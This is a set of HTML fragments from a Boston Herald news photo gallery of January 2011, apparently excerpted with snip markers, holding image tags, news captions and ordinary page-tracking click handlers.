    <img id="197557" src="http://multimedia.heraldinteractive.com/images/20110124/stp/0ad2c1_super.jpg" title="A worker on a lift makes some final adjustments to the word Super along the North side of Cowboys Stadium, site of Super Bowl XLV NFL football game, Friday, in Arlington, Texas. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
z’ offers new insight into Chaz Bono’s transition to male"
onclick="switchPhoto('197528');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197528" src="http://multimedia.heraldinteractive.com/images/20110124/stp/634a5f_ltpchazbono.jpg" title="Chaz Bono, left, subject of the documentary film \"Becoming Chaz,\" poses with his girlfriend Jennifer Elia at the premiere of the film at the 2011 Sundance Film Festival in Park City, Utah yesterday. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
atriots/view.bg?articleid=1311662" title="Tom Brady unanimous All-Pro"
onclick="switchPhoto('197533');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197533" src="http://multimedia.heraldinteractive.com/images/20110124/stp/efa1ad_ltpbrady3.jpg" title="Patriots quarterback Tom Brady was named a unanimous All-Pro selection today."
alt="Matt Stone (File)" style="margin:0 2px" />
</a>
...[SNIP]...
id=1311661" title="Judge allows NY beheading suspect to be own lawyer"
onclick="switchPhoto('197520');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197520" src="http://multimedia.heraldinteractive.com/images/20110124/stp/1b4631_hass.jpg" title="This undated file photo provided by Bridges TV shows Muzzammil Hassan and his wife Aasiya Zubair Hassan of Orchard Park, N.Y., at the the Muslim-oriented television the couple ran. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1311614" title="2 Florida officers, suspect killed in firefight"
onclick="switchPhoto('197491');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197491" src="http://multimedia.heraldinteractive.com/images/20110124/stp/0c480c_shoot.jpg" title="An armed police officer stands near rescue vehicles about a block away from where a U.S. Marshal and two St. Petersburg police officers were shot while trying to serve an arrest warrant Monday, in south St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1311581" title="Dustin Pedroia hangs with the big dawgs"
onclick="switchPhoto('197478');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197478" src="http://multimedia.heraldinteractive.com/images/20110124/stp/c9d99f_pedroia012411.jpg" title="Dustin Pedroia continues his sponsorship deal as Sullivan Tire spokesperson. He filmed a commercial Wednesday with ‘Misty.’"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
0" title="4 Detroit officers hurt in precinct shooting; gunman killed"
onclick="switchPhoto('197473');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197473" src="http://multimedia.heraldinteractive.com/images/20110124/stp/6dd69e_detroit012411.jpg" title="Detroit police point to a broken window at the precinct 6 building in northwest Detroit where a gunman walked into the police station and opened fire injuring three police officers, Sunday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
itle="We Hear: Josh Beckett, Lamar Odom, Khloe Kardashian and more..."
onclick="switchPhoto('197447');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197447" src="http://multimedia.heraldinteractive.com/images/20110123/stp/ccc6fe_josh_01242011.jpg" title="Josh Beckett."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
"Tracked Down: Maria Menounos, John Henry, Martha Coakley and more..."
onclick="switchPhoto('197446');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197446" src="http://multimedia.heraldinteractive.com/images/20110123/stp/d5e151_henry_01242011.jpg" title="John Henry and his wife, Linda, left, and Big Brothers Big Sisters
CEO Wendy Foster attend the agency’s Big 12 Gala."
alt="John Kreis" style="margin:0 2px" />
</a>
...[SNIP]...
="Story of Nancy Kerrigan and Tonya Harding comes alive in rock opera"
onclick="switchPhoto('197445');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197445" src="http://multimedia.heraldinteractive.com/images/20110123/stp/a3db6f_ice_01242011.jpg" title="Figure skaters Nancy Kerrigan, left, and Tonya Harding practice
at the 1994 Winter Olympics at Hamar Olympic Ampitheater in Hamar, Norway, just weeks after Kerrigan was attacked."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311518" title="Cold, hard truth..."
onclick="switchPhoto('197443');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197443" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7de6bf_walk_01242011.jpg" title="BONE-CHILLING: Bundled-up walkers make their way along the beach off Day Boulevard  in South Boston yesterday.
"
alt="Matthew Healey" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1311505" title="Gunman shoots 4 officers inside Detroit precinct"
onclick="switchPhoto('197436');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197436" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b83f4f_police_01242011.jpg" title="Detroit police stand outside the precinct 6 building in northwest Detroit where police say a gunman walked into the police station and opened fire injuring three officers. Police returned fire, killing the gunman. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
11413" title="China’s new stealth fighter may use US technology"
onclick="switchPhoto('197358');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197358" src="http://multimedia.heraldinteractive.com/images/20110123/stp/c2cb1a_china.jpg" title="In this Jan. 20, 2011 photo Zoran Milicevic, museum deputy executive speaks and gestures in front of the wing of an U.S. F-117A stealth fighter, downed during the 78-day air-campaign against Yugoslavia, at Belgrade’s aviation museum, Serbia. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eral/view.bg?articleid=1311411" title="USA-Chile draw 1-1 in friendly"
onclick="switchPhoto('197355');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197355" src="http://multimedia.heraldinteractive.com/images/20110123/stp/2c3b55_us.jpg" title="Chile’s Juan Abarca, right, and United States’ Juan Agudelo, second from right, battle for the ball as USA’s Alejandro Bedoya, second from left, and Sean Franklin look on during the second half of their soccer friendly match, Saturday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
="Tracked Down: Tyler Seguin, Kim Kardashian, Tom Brady Sr. & more..."
onclick="switchPhoto('197323');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197323" src="http://multimedia.heraldinteractive.com/images/20110122/stp/4b4a61_Kardashian_01232011.jpg" title="Boston Latino TV host Tim Estiloz and reality TV gal Kim Kardashian in La-La."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
="Tracked Down: Tyler Seguin, Kim Kardashian, Tom Brady Sr. & more..."
onclick="switchPhoto('197324');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197324" src="http://multimedia.heraldinteractive.com/images/20110122/stp/f1c7bf_Seguin_01232011.jpg" title="Bruins rookie Tyler Seguin has a ‘heart’ at Sanborn Elementary School in Andover."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1311375" title="C’s family ‘Meal’ ticket"
onclick="switchPhoto('197322');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197322" src="http://multimedia.heraldinteractive.com/images/20110122/stp/17caa1_Ladies_01232011.jpg" title="From left, Ashley Bachelor, Brandi Garnett, Shannon Allen and Julie Pierce attend the ‘Pre-Game Meal’ launch party at Winston Flowers in Chestnut Hill."
alt="Michael Blanchard photography" style="margin:0 2px" />
</a>
...[SNIP]...
nal/view.bg?articleid=1311366" title="Revere victim hailed by friends"
onclick="switchPhoto('197369');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197369" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b19601_012111murderce002.jpg" title="Stephanie Moulton"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197375');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197375" src="http://multimedia.heraldinteractive.com/images/20110123/stp/8e5a2c_dali.jpg" title="This Monday, Jan. 10, 2011 photo shows a 1953 portrait of Salvador Dali, by Philippe Halsman and purchased by the Salvador Dali Museum, as it hangs in one of the galleries at the museum in St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197374');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197374" src="http://multimedia.heraldinteractive.com/images/20110123/stp/fe87f5_dalib.jpg" title="This Monday, Jan. 10, 2011 photo shows one of the galleries at the new Salvador Dali Museum in St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197376');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197376" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b1b8a5_muse.jpg" title="This Monday, Jan. 10, 2011 photo shows a photographer as he shoots through the windows in the new Salvador Dali Museum in St. Petersburg, Fla."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
politics/view.bg?articleid=1311347" title="The Ballad of Chuck Turner"
onclick="switchPhoto('197313');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197313" src="http://multimedia.heraldinteractive.com/images/20110122/stp/13ee1c_Sing_01232011.jpg" title="EMBATTLED ‘HYMN’: Members of the Raging Grannies serenade Chuck Turner yesterday at an event in Cambridge."
alt="Christopher Evans" style="margin:0 2px" />
</a>
...[SNIP]...
08" title="Tom Brady’s guru didn’t see any problems afoot"
onclick="switchPhoto('197407');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197407" src="http://multimedia.heraldinteractive.com/images/20110123/stp/9fc13e_ltptomb20110123.jpg" title="Tom Brady"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
al/view.bg?articleid=1311306" title="Pictures worth a thousand smiles"
onclick="switchPhoto('197315');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197315" src="http://multimedia.heraldinteractive.com/images/20110122/stp/67af39_powell_01232011.JPG" title="‘SOMETHING TO HANG ONTO’: Artist Cristina Powell, 22, who suffers from cerebral palsy, takes a phone call inside her gallery at Floating Hospital for Children at Tufts Medical Center."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
tball/celtics/view.bg?articleid=1311294" title="Green implode on road"
onclick="switchPhoto('197341');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197341" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7d4b92_Cs_01232011.jpg" title="IN YOUR FACE: The Wizards’ Andray Blatche dunks the ball over the Celtics’ Glen Davis (11), as Kevin Garnett (5) and Paul Pierce stand by, last night in Washington. Blatche and the Wizards battled back to score an 85-83 win against the C&#x2"
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
1252" title="Steelers DL Aaron Smith continues 3-month wait to return"
onclick="switchPhoto('197266');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197266" src="http://multimedia.heraldinteractive.com/images/20110122/stp/15dd12_smith.jpg" title="Pittsburgh Steelers defensive end Aaron Smith, right, talks with defensive coordinator Dick LeBeau before NFL football practice, Wednesday, Jan. 19, 2011, in Pittsburgh. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
1170" title="Future of Sudan’s Darfur uncertain post-referendum"
onclick="switchPhoto('197201');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197201" src="http://multimedia.heraldinteractive.com/images/20110122/stp/629051_darf.jpg" title=" In this March 23, 2009 file photo, Two UNAMID peacekeepers patrol by trucks loaded with new arrivals of displaced Sudanese at Zamzam refugee camp, outside the Darfur town of al-Fasher, Sudan. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
al_estate/view.bg?articleid=1311127" title="Stylish duplex in Southie"
onclick="switchPhoto('197161');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197161" src="http://multimedia.heraldinteractive.com/images/20110121/stp/30fd84_Real_01202011.jpg" title="CONTEMPORARY LOOK: Unit 3 at 50 Athens St. in South Boston features a full-wall cherrywood built-in media unit in the living/dining area."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
/view.bg?articleid=1311006" title="Who’s afraid of Paul Pierce?"
onclick="switchPhoto('197081');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197081" src="http://multimedia.heraldinteractive.com/images/20110121/stp/b89b7f_ltpPierceA012111.jpg" title="The Celtics’ Paul Pierce hams it up with custodian Paul Smith, left, and fifth grader Jayla Belcher as they perform a skit about the Three Little Pigs at the John Winthrop Elementary School in Dorchester yesterday."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1310990" title="Steven Tyler’s their ‘Idol’"
onclick="switchPhoto('197091');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197091" src="http://multimedia.heraldinteractive.com/images/20110121/stp/794842_ltpTyler012111.jpg" title="Steven Tyler, a new judge on ‘American Idol,’ looks on during a panel discussion on the show at the FOX Broadcasting Company Television Critics Association winter press tour in Pasadena, Calif., Tuesday, Jan. 11, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
Down: Jenny McCarthy, BenJarvus Green-Ellis, Kevin Faulk and more..."
onclick="switchPhoto('197034');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197034" src="http://multimedia.heraldinteractive.com/images/20110120/stp/0abd7f_jenn_01212011.jpg" title="Tryst chef Paul Turano and Hollywood hottie Jenny McCarthy."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1310981" title="Life Is Sweet Aboard the SS Heinz-Kerry"
onclick="switchPhoto('197033');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197033" src="http://multimedia.heraldinteractive.com/images/20110120/stp/736880_kerry_01212011.jpg" title="Sen. John Kerry, wife Teresa Heinz and daughter Alexandra being ferried to the
dock in St. Barts in a rubber raft."
alt="StarTraks" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1310853" title="Paul the Octopus memorialized at German aquarium"
onclick="switchPhoto('197005');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197005" src="http://multimedia.heraldinteractive.com/images/20110120/stp/9218a3_ltppaulocto.jpg" title="Photographers surround the monument of Paul the octupus at Sea Life aquarium in Oberhausen, western Germany today. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1310834" title="Tentacled tipster Paul the Octopus gets memorial"
onclick="switchPhoto('197000');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197000" src="http://multimedia.heraldinteractive.com/images/20110120/stp/911e4d_ltpPaulOcto012011.jpg" title="Photographers surround the monument of Paul the octupus at Sea Life aquarium in Oberhausen, western Germany Thursday Jan. 20, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
itle="Tracked Down: Jenny McCarthy, Mark Ballas, Wes Welker & more..."
onclick="switchPhoto('196935');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196935" src="http://multimedia.heraldinteractive.com/images/20110119/stp/145896_Dance_01202011.jpg" title="‘Dancing with the Stars’ champ Mark Ballas leads a dance class at the Boys and Girls Club in Dorchester."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1310767" title="Stress afoot for Tom Brady and Gisele Bundchen"
onclick="switchPhoto('196938');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196938" src="http://multimedia.heraldinteractive.com/images/20110119/stp/ed287b_TomGi_01202011.jpg" title="Gisele Bundchen heads off for some craniosacral therapy. Tom Brady skulks home in the snow."
alt="Mark Garfinkel/ INF.com" style="margin:0 2px" />
</a>
...[SNIP]...
roadway’s ‘Spider-Man’ a train wreck in the making?"
onclick="switchPhoto('196902');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196902" src="http://multimedia.heraldinteractive.com/images/20110119/stp/6ca788_Spidey_10082010.jpg" title=""
alt="File" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1310770" title="Celtics beat Pistons 86-82 for 4th straight win"
onclick="switchPhoto('196919');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196919" src="http://multimedia.heraldinteractive.com/images/20110119/stp/067d56_Rondo_0120211.jpg" title="REVERSAL: Rajon Rondo goes behind the back to thread a pass between Detroit Pistons Rodney Stuckey and Greg Monroe during the Celtics’ 86-82 win over the Detroit Pistons at the TD Garden."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1310688" title="Greece seeking better rates on rescue loans"
onclick="switchPhoto('196891');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196891" src="http://multimedia.heraldinteractive.com/images/20110119/stp/8958ac_greec.jpg" title="A woman walks outside a closed pharmacy during a strike in Athens Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1310685" title="Defendant pleads guilty in NY hedge fund case"
onclick="switchPhoto('196889');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196889" src="http://multimedia.heraldinteractive.com/images/20110119/stp/31ada1_chies.jpg" title="Danielle Chiesi walks into the Daniel Patrick Moynihan United States Court House in New York, Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1310672" title="Alcohol industry grapples with nutrition labeling"
onclick="switchPhoto('196881');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196881" src="http://multimedia.heraldinteractive.com/images/20110119/stp/1d8117_alc.jpg" title="This Jan. 16, 2011 photo shows bottles of vodka, wine and beer from Diageo alongside proposed nutrition labels in Concord, N.H."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1310654" title="NASA pulls injured shuttle astronaut off flight"
onclick="switchPhoto('196876');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196876" src="http://multimedia.heraldinteractive.com/images/20110119/stp/e31124_ltpkopra.jpg" title="U.S. Army astronaut Col. Tim Kopra "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1310573" title="Official: Video shows congresswoman shot in face"
onclick="switchPhoto('196874');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196874" src="http://multimedia.heraldinteractive.com/images/20110119/stp/9b0a25_kell.jpg" title="Mark Kelly, husband of Rep. Gabrielle Giffords, talks about his life with Gabby Tuesday, at the University Medical Center in Tucson, Az. "
alt="AP/The Arizona Republic, Tom Tingle" style="margin:0 2px" />
</a>
...[SNIP]...
id=1310566" title="Old dog, new tricks: Study IDs 9,400-year-old mutt"
onclick="switchPhoto('196848');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196848" src="http://multimedia.heraldinteractive.com/images/20110119/stp/89d7f8_ltpDogbone011911.jpg" title="Researcher Samuel Belknap III poses with a skull of a domestic dog, Friday, Jan. 14, 2011, at the University of Maine in Orono."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
d=1310563" title="Arizona cyclists rally for Giffords’ recovery"
onclick="switchPhoto('196847');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196847" src="http://multimedia.heraldinteractive.com/images/20110119/stp/0294ea_ltpBikeshopowner011911.jpg" title="Tucson bike builder Dave Bohm poses in his shop in Tucson, Ariz., on Tuesday, Jan. 18, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1310562" title="Tell-tale letdown: Poe visitor again a no-show"
onclick="switchPhoto('196846');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196846" src="http://multimedia.heraldinteractive.com/images/20110119/stp/c32e03_ltpPoegrave011911.jpg" title="Jeff Jerome, curator of the Poe House and Museum, opens a gate at Westminster Church and Cemetary in Baltimore, the burial place of author Edgar Allan Poe, Wednesday, Jan. 19, 2011. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
" title="We won’t know LeBron James until he fights off critics"
onclick="switchPhoto('196845');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196845" src="http://multimedia.heraldinteractive.com/images/20110119/stp/370b86_ltpLeBronJames011911.jpg" title="Miami Heat’s LeBron James drives to the basket during second-quarter action against the Atlanta Hawks at AmericanAirlines Arena in Miami, Florida, on Tuesday, January 18, 2011."
alt="Hector Gabino/El Nuevo Herald/MCT" style="margin:0 2px" />
</a>
...[SNIP]...
tainment/food_dining/food/view.bg?articleid=1310539" title="Fast Food"
onclick="switchPhoto('196858');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196858" src="http://multimedia.heraldinteractive.com/images/20110119/stp/373fd2_Scanlon.jpg" title="Chris Scanlon cooks up steaks at the Oregon Club."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
tainment/food_dining/food/view.bg?articleid=1310539" title="Fast Food"
onclick="switchPhoto('196859');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196859" src="http://multimedia.heraldinteractive.com/images/20110119/stp/e935b5_011711cakems01.JPG" title="YUMMY TREATS: Carrie Lincoln, of Sugar Orchids, shows off her wedding cakes."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
="We Hear: Julianne Moore, Conan O’Brien, Tom Brady and more..."
onclick="switchPhoto('196794');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196794" src="http://multimedia.heraldinteractive.com/images/20110118/stp/c93551_wehear_01192011.jpg" title="Brittany Carnegie
with Travis, a pit bull mix, at Nevins Farm."
alt="MSPCA" style="margin:0 2px" />
</a>
...[SNIP]...
de_track/view.bg?articleid=1310498" title="Shaq takes a lickin’"
onclick="switchPhoto('196811');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196811" src="http://multimedia.heraldinteractive.com/images/20110119/stp/74b754_shaq_01192011.jpg" title="Shaquille O’Neal licks an Oreo in a competition with Maya Schauber, 7 year old from Mashpee, during an event at the Prudential Center. "
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1310397" title="2 wounded at LA school when gun in backpack fires"
onclick="switchPhoto('196774');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196774" src="http://multimedia.heraldinteractive.com/images/20110118/stp/ab137e_weast.jpg" title="Christy Westbrooks, whose daughter is a junior at Gardena High School, talks on the phone while standing outside the school in Gardena, Calif., Tuesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
="Expect lots of changes as ‘Idol’ gears up for Season 10"
onclick="switchPhoto('196737');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196737" src="http://multimedia.heraldinteractive.com/images/20110118/stp/019f4d_ENTER_TV-IDOL_2_MCT.jpg" title="Pictured here, Steven Tyler, from left, Ryan Seacrest, Jennifer Lopez and Randy Jackson. "
alt="Michael Becker/Courtesy FOX/MCT" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1310358" title="Haitian police take ex-dictator to court"
onclick="switchPhoto('196754');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196754" src="http://multimedia.heraldinteractive.com/images/20110118/stp/487983_doc.jpg" title="Police officers take ex-dictator Jean-Claude Duvalier out of his hotel in Port-au-Prince, Haiti, Tuesday. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1310355" title="Broncos RB Laurence Maroney arrested in St. Louis"
onclick="switchPhoto('196729');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196729" src="http://multimedia.heraldinteractive.com/images/20110118/stp/f6f2ae_ltpMaroney011811.jpg" title="Former Patriots running back Laurence Maroney"
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
nba/view.bg?articleid=1310354" title="Thunder misfires in Los Angeles"
onclick="switchPhoto('196728');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196728" src="http://multimedia.heraldinteractive.com/images/20110118/stp/16ba83_ltpKobe011811.jpg" title="Los Angeles Lakers Kobe Bryant dunks against the Oklahoma Thunder at the Staples Center in Los Angeles, California, Monday, January 17, 2011."
alt="Wally Skalij/Los Angeles Times/MCT" style="margin:0 2px" />
</a>
...[SNIP]...
id=1310325" title="Nun tells of healing after praying to John Paul II"
onclick="switchPhoto('196716');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196716" src="http://multimedia.heraldinteractive.com/images/20110118/stp/02f576_ltpPierre011811.jpg" title="Sister Marie Simon-Pierre, stands next to a portrait of Pope John Paul II, during a press conference at Aix-en-Provence’s archbishopric, Monday, Jan. 17, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1310322" title="A good night for a ‘Fighter’"
onclick="switchPhoto('196715');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196715" src="http://multimedia.heraldinteractive.com/images/20110118/stp/b79e4a_ltpEklund011811.jpg" title="Lowell boxer Dicky Eklund with galpal Leslie Stephens, left, and daughter Kerry Moore, right, at Garcia  Brogan’s Tavern in Lowell."
alt="David Brow/Lowell Sun" style="margin:0 2px" />
</a>
...[SNIP]...
319" title="Tracked Down: Maria Menounos , Kevin Youkilis and more..."
onclick="switchPhoto('196714');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196714" src="http://multimedia.heraldinteractive.com/images/20110118/stp/ffa43e_ltpMariaA011811.jpg" title="Maria Menounos shows her team spirit at the Golden Globe Awards."
alt="Frazer Harrison/Getty Images" style="margin:0 2px" />
</a>
...[SNIP]...
0284" title="Gisele Patriots ‘jinx’ rears ugly head again"
onclick="switchPhoto('196656');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196656" src="http://multimedia.heraldinteractive.com/images/20110117/stp/627b5b_ltp040910brady7.jpg" title="The Curse Of The Babe-ino? Tom Brady can’t win the big game since taking up with uber-hot supermodel Gisele Bundchen."
alt="A/X17online.com" style="margin:0 2px" />
</a>
...[SNIP]...
s/view.bg?articleid=1310247" title="Jets-Patriots playoff report card"
onclick="switchPhoto('196688');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196688" src="http://multimedia.heraldinteractive.com/images/20110118/stp/6c9023_ltpwilfork.jpg" title="Patriots defensive tackle Vince Wilfork (75) is held back by a side judge and his teammates as he shouts to the Jets in the 4th quarter."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
bruins/view.bg?articleid=1310235" title="Bruins enjoy holiday blowout"
onclick="switchPhoto('196680');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196680" src="http://multimedia.heraldinteractive.com/images/20110118/stp/cbdd98_ltpbsceleb.jpg" title="THREE-FOR-ALL: The Bruins’ Patrice Bergeron (37) celebrates his second-period goal with teammates Mark Recchi (28) and Steven Kampfer (47) yesterday at the Garden.
"
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
10222" title="John Paul II’s blood to be relic in Polish church"
onclick="switchPhoto('196644');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196644" src="http://multimedia.heraldinteractive.com/images/20110117/stp/8525f1_ltppjpii.jpg" title="Pope John Paul II (File 2003)"
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
0176" title="Zdeno Chara, Tim Thomas lift Bruins past Hurricanes, 7-0"
onclick="switchPhoto('196611');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196611" src="http://multimedia.heraldinteractive.com/images/20110117/stp/96aede_011711bruinsnl02.JPG" title=" Marc Savard (91) celebrates with Zdeno Chara (33) after Chara’s goal in the first period today at the TD Garden in Boston."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
0165" title="Obama to honor China’s president with state dinner"
onclick="switchPhoto('196605');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196605" src="http://multimedia.heraldinteractive.com/images/20110117/stp/13b9ac_jint.jpg" title=" In this Nov. 11, 2010, file photo China’s President Hu Jintao waves upon arrival at the Seoul Military Airport to attend the G-20 Summit in Seoul, South Korea."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
e="Haiti’s ‘Baby Doc’ in surprise return from exile"
onclick="switchPhoto('196594');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196594" src="http://multimedia.heraldinteractive.com/images/20110117/stp/4bd903_duva.jpg" title="Haiti’s former dictator Jean-Claude \"Baby Doc\" Duvalier, center, waves to supporters from a hotel balcony after his arrival in Port-au-Prince, Haiti, Sunday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1310083" title="For Steelers, there’s no place like home"
onclick="switchPhoto('196542');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196542" src="http://multimedia.heraldinteractive.com/images/20110117/stp/c68990_ltpRoethlisberger011711.jpg" title="Pittsburgh Steelers quarterback Ben Roethlisberger (7) celebrates after a 31-24 win over the Baltimore Ravens in an NFL divisional football game in Pittsburgh, Saturday, Jan. 15, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
